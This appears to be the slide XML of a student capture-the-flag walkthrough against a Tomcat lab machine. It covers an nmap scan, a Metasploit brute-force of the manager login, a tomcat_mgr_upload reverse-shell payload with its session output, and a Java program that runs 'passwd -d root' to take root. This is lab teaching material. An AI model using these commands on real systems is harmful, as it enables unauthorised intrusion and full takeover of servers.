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13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14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15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13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13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/>
          <p:nvPr>
            <p:ph type="pic" idx="13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Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14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1056335080_2112X2816.jpg"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="15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/>
          <p:nvPr>
            <p:ph type="pic" idx="13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/>
          <p:nvPr>
            <p:ph type="pic" idx="13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14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15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16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531205463_2542x1430.jpg"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="13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545882547_1308x1744.jpeg"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="13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13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y_tom_cat host"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2089149" y="4544483"/>
            <a:ext cx="20205701" cy="3911601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>My_tom_cat host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Capture the flag:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2089149" y="2349018"/>
            <a:ext cx="20205701" cy="1614555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Capture the flag:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="By:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18860227" y="6918420"/>
            <a:ext cx="3604879" cy="4758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aseline="-3448" spc="29" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>By:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr baseline="-3448" spc="29" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Abhishek manyam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr baseline="-3448" spc="29" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Kuladeep mantri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr baseline="-3448" spc="29" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Rishitha pokalkar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr baseline="-3448" spc="29" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Zafeer Khan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ave it as exploitt.java…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="6246569"/>
            <a:ext cx="7835743" cy="5617448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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3888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Save it as exploitt.java</a:t>
            </a:r>
            <a:endParaRPr b="1"/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Move the file to apache2 folder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mv exploitt.java /var/www/html/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service apache2 start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now go to Metasploit terminal where we opened the command shell of tomcat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go to tmp folder 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b="0" spc="0" sz="291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bash-4.2$ cd tmp/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Phase-7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="3036408"/>
            <a:ext cx="7835743" cy="2933701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Phase-7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212" name="imagec.png" descr="imagec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406471" y="4429384"/>
            <a:ext cx="14170637" cy="48572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d.png" descr="image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53403" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="358558" y="6019091"/>
            <a:ext cx="10285976" cy="4047026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="imagee.png" descr="imagee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53060" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12989815" y="4398015"/>
            <a:ext cx="10285848" cy="7289210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Removing password for user root and…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474085" y="4035242"/>
            <a:ext cx="7499992" cy="1664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Removing password for user root and </a:t>
            </a:r>
          </a:p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gaining root access : </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="“Capturing the flag” proof.txt :"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13074259" y="3389386"/>
            <a:ext cx="605106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“Capturing the flag” proof.txt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rying to find the IP Address via netdiscover and to find open ports and services, we used nmap -A &lt;ip&gt;."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="8015916"/>
            <a:ext cx="8370130" cy="3848101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr b="0" spc="0"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Trying to find t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>he IP Address via netdiscover and to find open ports and services, we used nmap -A &lt;ip&gt;.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Phase-1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4925417"/>
            <a:ext cx="8370129" cy="2933701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Phase-1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="image8.png" descr="image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144886" y="2350496"/>
            <a:ext cx="13432222" cy="90150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e found two open ports…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="8015916"/>
            <a:ext cx="7788758" cy="3848101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0000"/>
              </a:lnSpc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found two open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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a. SSH at port 22/tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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b. HTTP at port 8080/tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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Then we opened the HTTP in the browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="phase-2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4925417"/>
            <a:ext cx="7788757" cy="2933701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>phase-2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="image9.png" descr="image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974678" y="2058324"/>
            <a:ext cx="13602430" cy="95993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o find the credentials of Tomcat Manager Webapp we used Metasploit and do a brute-force attack.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088436" y="3421130"/>
            <a:ext cx="20207128" cy="87762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 find the credentials of Tomcat Manager Webapp we used Metasploit and do a brute-force attack.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1 - Turn on Postgresql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service postgresql start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2 - Open Metasploit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msfconsole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3 -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search tomcat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4 –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use auxiliary/scanner/http/tomcat_mgr_login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5 –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set rhosts 192.168.0.12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rhosts =&gt; 192.168.0.1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set rport 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rport =&gt; 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run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Phase-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Phase-3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e found [+] 192.168.0.12:8080 - Login Successful: tomcat:tomcat…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340203" y="2228694"/>
            <a:ext cx="7881265" cy="9258612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/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found </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="36598"/>
                    <a:lumOff val="-17227"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[+] 192.168.0.12:8080 - Login Successful: tomcat:tomcat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username – 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password – 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Then open </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="36598"/>
                    <a:lumOff val="-17227"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.0.12:8080/manager/html</a:t>
            </a:r>
            <a:r>
              <a:t> using credentials we found above.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="196" name="imagea.png" descr="imagea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04" t="0" r="404" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10091389" y="1906563"/>
            <a:ext cx="13872294" cy="99028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aining access using metasploit:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082800" y="3079036"/>
            <a:ext cx="20207127" cy="8501399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="379475">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr spc="0" sz="39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Gaining access using metasploit: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Open msfconsole in terminal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search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use exploit/multi/http/tomcat_mgr_upload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rhost 192.168.0.12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rhost =&gt; 192.168.0.12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rport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rport =&gt;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payload java/shell_reverse_tcp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payload =&gt; java/shell_reverse_tcp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HttpUsername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HttpUsername =&gt;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HttpPassword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HttpPassword =&gt;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lhost 192.168.0.11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lhost =&gt; 192.168.0.11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lport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pc="0" sz="29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lport =&gt; 8080</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Phase-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Phase-4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sf5 exploit(multi/http/tomcat_mgr_upload) &gt; exploit…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088436" y="3716970"/>
            <a:ext cx="20207128" cy="628206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exploit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Started reverse TCP handler on 192.168.0.11:8080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Retrieving session ID and CSRF token...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Uploading and deploying u0hO...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Executing u0hO...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Undeploying u0hO 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0" spc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Command shell session 1 opened (192.168.0.11:8080 -&gt; 192.168.0.12:58154) at 2020-05-20 05:29:31 -0400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ned bash using…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="8015916"/>
            <a:ext cx="9065949" cy="3848101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7916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr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Opened bash using </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr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python -c 'import pty; pty.spawn("/bin/bash")'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Phase-5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4925417"/>
            <a:ext cx="7757403" cy="2933701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Phase-5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="imageb.png" descr="imageb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8070" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11191598" y="4275212"/>
            <a:ext cx="12385510" cy="51655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reate a java exploit file in home directory…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082800" y="3079036"/>
            <a:ext cx="20207127" cy="8928197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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390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 a java exploit file in home directory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import java.io.BufferedReader;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import java.io.InputStreamReader;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public class exploitt {  //you have to change thew class same as file name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public static void main(String args[]) {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String s;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Process p;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try {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 = Runtime.getRuntime().exec("passwd -d root");  //the command you want to execute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BufferedReader br = new BufferedReader(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new InputStreamReader(p.getInputStream()));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while ((s = br.readLine()) != null)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System.out.println("line: " + s);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p.waitFor();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System.out.println ("exit: " + p.exitValue());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p.destroy();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} catch (Exception e) {}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}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pc="0" sz="204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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Phase-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Phase-6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